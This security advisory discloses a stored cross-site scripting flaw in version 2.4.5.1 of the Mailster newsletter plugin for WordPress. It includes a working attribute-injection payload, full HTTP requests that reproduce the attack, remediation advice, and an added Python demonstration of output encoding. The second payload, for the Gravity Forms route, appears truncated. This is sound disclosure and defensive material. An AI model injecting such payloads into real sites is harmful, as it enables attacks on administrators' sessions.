################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product:  Mailster - Email Newsletter Plugin for WordPress
# Vendor:   EverPress
# CSNC ID:  CSNC-2019-023
# Subject:  Cross-Site Scripting (XSS)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz
# Date:     08.07.2020
#
################################################################################

Introduction:
-------------
Mailster [1] is a newsletter plugin for WordPress. It allows its users to
create, send and track newsletter campaigns.

Compass Security identified a stored Cross-Site Scripting (XSS) vulnerability
affecting the administration interface. Successful exploitation requires no
authentication and can be performed remotely.

Affected:
---------
Vulnerable:
 * Mailster - Email Newsletter Plugin for WordPress 2.4.5.1

Not vulnerable:
 * Mailster - Email Newsletter Plugin for WordPress 2.4.9

No other version was tested, but older versions are believed to be vulnerable
as well.

Technical Description:
----------------------
Subscriber data is not properly encoded when it is echoed back on the
administration interface. The browser therefore interprets it as markup,
which allows an attacker to execute JavaScript code in the context of the
victim's browser (usually an administrator's) whenever malicious subscribers
of the newsletter are displayed. Exploiting this vulnerability allows an
unauthenticated user to attack the administration interface of the WordPress
instance.

The Mailster newsletter registration forms strip dangerous characters such as
"<" or ">". However, it was possible to embed an XSS payload without using
them.
In order to reproduce the vulnerability, subscribe to the newsletter as an
unauthenticated user and use the following as name:

Test" onmouseover=alert(1) onfocus=alert(1) tabindex=1 a=

Request subscribing to the newsletter as an unauthenticated user with the
malicious payload from above in "firstname":

POST /mailster/subscribe HTTP/1.1
Host: wordpress.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 394
Cookie: [CUT]
Connection: close

_action=update&_referer=https%3A%2F%2Fwordpress.example.com%2Fnewsletter-signup%2Fprofile%2F&_hash=[CUT]&_nonce=[CUT]&formid=4&email=test%40example.com&firstname=Test%22+onmouseover%3Dalert(1)+onfocus%3Dalert(1)+tabindex%3D1+a%3D&lastname=Test&birthday=2000-01-01&drop-down=Option+A&_status=1&lists%5B0%5D=&lists%5B0%5D=1&lists%5B1%5D=&lists%5B2%5D=

Response showing that the request was accepted:

HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 12:35:08 GMT
Content-Type: application/json
Connection: close
Content-Length: 50

{"success":true,"html":"<p>Profile updated!<\/p>"}

Request displaying the profile of the user subscribed before on the
administration interface (WordPress Administration > Newsletter > Subscribers
> Open profile):

GET /wp-admin/edit.php?post_type=newsletter&page=mailster_subscribers&ID=1337 HTTP/1.1
Host: wordpress.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [CUT]
Connection: close

Response showing that it was possible to break out of the context and execute
JavaScript:

HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 12:35:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41730

[CUT]
{firstname}
[CUT]

When the administrator moves the mouse over the "{firstname}" label in the
"Name" attribute, the JavaScript payload is triggered and a popup is
displayed. The same happens when the administrator presses "Tab" on the
keyboard.

Stripping dangerous characters on input is unsafe, since there are several
ways data can be loaded into the database (e.g. user registration, bulk import
or another plugin). The encoding should take place on output instead.

It was also possible to exploit this by using the "Mailster Gravity Forms 1.1"
[2] plugin, which loads data coming from "Gravity Forms 2.4.14" [3] into
Mailster. With this setup, an XSS payload could be embedded in the
subscriber's name. It is then executed directly when the subscribers list is
opened on the administration interface. The name to use on "Gravity Forms" was
the following:

Test

During the various fix attempts, several other stored XSS were found.

Workaround / Fix:
-----------------
Dangerous characters should be encoded on output according to the encoding
rules of the respective type of context. The whole code should be analyzed
for this and updated accordingly.
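As an added example (not code from the advisory, from Compass Security or from
the Mailster plugin), the following Python script shows why an input filter
that only strips "<" and ">" does not stop the payload reported above, and how
encoding on output neutralizes it. The <input> template is a constructed
stand-in for the "Name" field on the subscriber profile page; Python's
html.parser is used to show which attributes a tokenizer actually recognises
in the rendered markup.

```python
# Added example (not code from the advisory, Compass Security or the Mailster
# plugin): why stripping "<" / ">" on input does not stop the reported payload,
# and how output encoding with the HTML rules does. The markup template is a
# constructed stand-in for the "Name" field on the subscriber profile page.
from __future__ import annotations

import html
from html.parser import HTMLParser

# Payload exactly as reported in the advisory. Note: it contains no "<" or ">".
PAYLOAD_NAME = 'Test" onmouseover=alert(1) onfocus=alert(1) tabindex=1 a='

# HTML encoding rules for body and quoted-attribute contexts.
HTML_ENCODE_TABLE = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def strip_angle_brackets(value: str) -> str:
    """Input filter of the kind the advisory describes: removes only < and >."""
    return value.replace("<", "").replace(">", "")


def html_encode(value: str) -> str:
    """Encode a string for insertion into an HTML body or quoted attribute.

    Each character is looked up once, so an "&" in the input is never encoded
    twice. The result equals html.escape(value, quote=True).
    """
    return "".join(HTML_ENCODE_TABLE.get(ch, ch) for ch in value)


def render_name_field(name: str, encode: bool) -> str:
    """Render the subscriber name into a quoted attribute, with or without
    output encoding. Constructed template, not Mailster's actual markup."""
    shown = html_encode(name) if encode else name
    return f'<input type="text" name="firstname" value="{shown}" class="regular-text">'


class _AttrCollector(HTMLParser):
    """Collects the (name, value) pairs of every start tag the tokenizer sees."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: list[tuple[str, str | None]] = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def parsed_attributes(markup: str) -> dict[str, str | None]:
    """Tokenize markup and return the attributes the parser recognises
    (entity references in attribute values are decoded, as a browser does)."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return dict(collector.attrs)


def injected_event_handlers(markup: str) -> list[str]:
    """Return attribute names that look like inline event handlers (on*).
    A non-empty list means the subscriber data broke out of its attribute."""
    return sorted(n for n in parsed_attributes(markup) if n.startswith("on"))


if __name__ == "__main__":
    filtered = strip_angle_brackets(PAYLOAD_NAME)
    print("input filter changed the payload:", filtered != PAYLOAD_NAME)
    for encode in (False, True):
        markup = render_name_field(filtered, encode)
        print(f"encode={encode}: handlers={injected_event_handlers(markup)}")
        print("  value attribute seen by parser:", parsed_attributes(markup)["value"])
    print("matches html.escape:", html_encode(PAYLOAD_NAME) == html.escape(PAYLOAD_NAME))
```

Without encoding, the parser reports onmouseover and onfocus as attributes of
the input element; with encoding, the whole payload ends up as the literal
value of the value attribute and no handler exists. html_encode is shown here
only to make the rules visible: in practice use html.escape(), or in a
WordPress plugin esc_attr() for attribute context and esc_html() for body
content. JavaScript and URL contexts require their own encoding rules.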
For regular HTML body content, use HTML encoding:

 - <  ->  &lt;
 - >  ->  &gt;
 - "  ->  &quot;
 - '  ->  &#x27;
 - &  ->  &amp;

As a Mailster customer, update your installation to the latest version to
receive the fix.

Timeline:
---------
2019-10-09: Discovery by Thierry Viaccoz
2019-10-10: Initial vendor notification
2020-03-24: Release of fixed version
2020-07-08: Coordinated public disclosure date

References:
-----------
[1] https://mailster.co/
[2] https://wordpress.org/plugins/mailster-gravity-forms/
[3] https://www.gravityforms.com/